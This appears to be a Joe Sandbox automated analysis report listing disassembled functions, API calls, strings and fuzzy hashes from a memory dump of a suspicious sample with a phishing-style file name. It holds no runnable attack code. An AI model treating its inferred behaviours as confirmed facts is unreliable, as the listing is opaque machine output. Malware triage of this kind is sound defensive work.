                                                                                                              APIs
                                                                                                              • wcschr.MSVCRT ref: 00413972
                                                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                                                              • memset.MSVCRT ref: 004139B8
                                                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                              • memset.MSVCRT ref: 00413A00
                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                              • String ID: \systemroot
                                                                                                              • API String ID: 4173585201-1821301763
                                                                                                              • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                              • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                              Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy
                                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                              • API String ID: 1284135714-318151290
                                                                                                              • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                              • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                              Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                              • String ID: 0$6
                                                                                                              • API String ID: 4066108131-3849865405
                                                                                                              • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                              • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                              • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                                                                              • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                              Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004082EF
                                                                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                              • memset.MSVCRT ref: 00408362
                                                                                                              • memset.MSVCRT ref: 00408377
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ByteCharMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 290601579-0
                                                                                                              • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                              • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                              • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                                                                                              • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                              Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memchr.MSVCRT ref: 00444EBF
                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                              • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                              • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                              • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                                                              • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                                                              • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                                                              • memset.MSVCRT ref: 0044505E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memchrmemset
                                                                                                              • String ID: PD$PD
                                                                                                              • API String ID: 1581201632-2312785699
                                                                                                              • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                              • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                              • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                                                                                              • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                              Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                              • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                              • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                              • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                              • GetParent.USER32(?), ref: 00409FA5
                                                                                                              • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 2163313125-0
                                                                                                              • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                              • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                              • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                              • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                              Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$wcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3592753638-3916222277
                                                                                                              • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                              • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                              • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                                                                                              • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                              Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040A47B
                                                                                                              • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                              • wcslen.MSVCRT ref: 0040A4BA
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                              • wcslen.MSVCRT ref: 0040A4E0
                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpywcslen$_snwprintfmemset
                                                                                                              • String ID: %s (%s)$YV@
                                                                                                              • API String ID: 3979103747-598926743
                                                                                                              • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                              • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                              • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                                                                                              • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                              Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                              • API String ID: 2780580303-317687271
                                                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                              Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                                                                                              • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                                                                                              • wcslen.MSVCRT ref: 0040A6B1
                                                                                                              • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                              • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                                                                                              • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                                              • API String ID: 2767993716-572158859
                                                                                                              • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                              • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                              • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                                                                                              • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                              Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                              • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                              • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                              • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                              • API String ID: 3176057301-2039793938
                                                                                                              • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                              • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                              • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                                                                                              • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                              Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                              • database is already attached, xrefs: 0042F721
                                                                                                              • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                              • database %s is already in use, xrefs: 0042F6C5
                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                              • out of memory, xrefs: 0042F865
                                                                                                              • unable to open database: %s, xrefs: 0042F84E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpymemset
                                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                              • API String ID: 1297977491-2001300268
                                                                                                              • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                              • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                              • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                                                                                              • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                              Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                                                                                • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                                                                                              • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                                                                                              • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                              • String ID: ($d
                                                                                                              • API String ID: 1140211610-1915259565
                                                                                                              • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                              • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                              • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                                                                                              • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                              Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                              • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                              • GetLastError.KERNEL32 ref: 004178FB
                                                                                                              • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$ErrorLastLockSleepUnlock
                                                                                                              • String ID:
                                                                                                              • API String ID: 3015003838-0
                                                                                                              • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                              • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                              • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
